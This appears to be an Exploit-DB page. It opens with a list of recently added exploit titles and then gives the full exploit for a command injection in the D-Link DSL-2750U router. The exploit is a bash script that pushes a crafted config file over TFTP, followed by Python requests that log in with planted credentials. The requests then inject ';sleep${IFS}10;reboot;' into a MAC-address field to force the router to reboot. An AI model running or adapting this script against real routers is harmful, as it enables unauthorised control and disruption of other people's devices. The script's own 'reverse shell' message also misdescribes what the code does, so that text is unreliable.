
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
109 lines
No EOL
3.2 KiB
Text
109 lines
No EOL
3.2 KiB
Text
# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection
|
|
# Date: 17-06-2021
|
|
# Exploit Author: Mohammed Hadi (HadiMed)
|
|
# Vendor Homepage: https://me.dlink.com/consumer
|
|
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16
|
|
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*
|
|
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6)
|
|
|
|
###
|
|
|
|
#!/bin/bash
|
|
|
|
# Exploit by HadiMed
|
|
|
|
# Takes advantage of the tftp server that accepts the cfg file blindly
|
|
echo -ne "\n"
|
|
echo "Exploiting Dlink DSL-2750u version 1.6"
|
|
echo -ne "\n\n"
|
|
|
|
# Sending the payload
|
|
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1
|
|
echo -ne "\n"
|
|
|
|
echo "File uploaded Successfully"
|
|
echo "Waiting for router to restart"
|
|
|
|
sleep 180 # approximate time for router to restart
|
|
|
|
python3 exploit.py
|
|
|
|
###
|
|
|
|
import requests
|
|
|
|
# HTTP request looks like this
|
|
'''
|
|
POST /cgi-bin/webproc HTTP/1.1
|
|
Host: 192.168.1.1
|
|
Content-Length: 175
|
|
Cache-Control: max-age=0
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: http://192.168.1.1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: http://192.168.1.1/cgi-bin/webproc
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91
|
|
Connection: close
|
|
|
|
getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91
|
|
'''
|
|
|
|
# 1 Getting a session id
|
|
|
|
# password and username crafted by me on the cfg.xml file
|
|
|
|
username = "pwned"
|
|
password= "pwned"
|
|
|
|
|
|
# acually the client set the sessionid in condition that the password and username are correct
|
|
|
|
Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"
|
|
Contentty="application/x-www-form-urlencoded"
|
|
Referer="http://192.168.1.1/cgi-bin/webproc"
|
|
Contentlen="175"
|
|
|
|
# Sending first request to set our session id
|
|
response = requests.post("http://192.168.1.1/cgi-bin/webproc",
|
|
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
|
|
,
|
|
data={ "getpage":"html/index.html",
|
|
"errorpage":"html/main.html",
|
|
"var:menu" : "setup",
|
|
"var:page":"wizard",
|
|
"obj-action":"auth",
|
|
":username":username,
|
|
":password":password,
|
|
":action":"login",
|
|
":sessionid":"deadbeef"
|
|
}
|
|
)
|
|
|
|
|
|
Referer = "http://192.168.1.1/cgi-bin/webupg"
|
|
|
|
name = "mac"
|
|
cmd = "1;sleep${IFS}10;reboot;"
|
|
|
|
Contentlen = str(len(name+cmd)+10)
|
|
|
|
if response.status_code==302:
|
|
print("got sessionid=deadbeef !\n waiting for the reverse shell ...")
|
|
|
|
# access cgi-bin/webupg
|
|
try :
|
|
response = requests.post("http://192.168.1.1/cgi-bin/webupg",
|
|
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
|
|
,data = {"name":name , "newmac":cmd} , timeout=0.0000000001
|
|
|
|
)
|
|
|
|
except requests.exceptions.Timeout :
|
|
|
|
print("done router will restart in 20 sec")
|
|
|
|
print("Device restarted!") |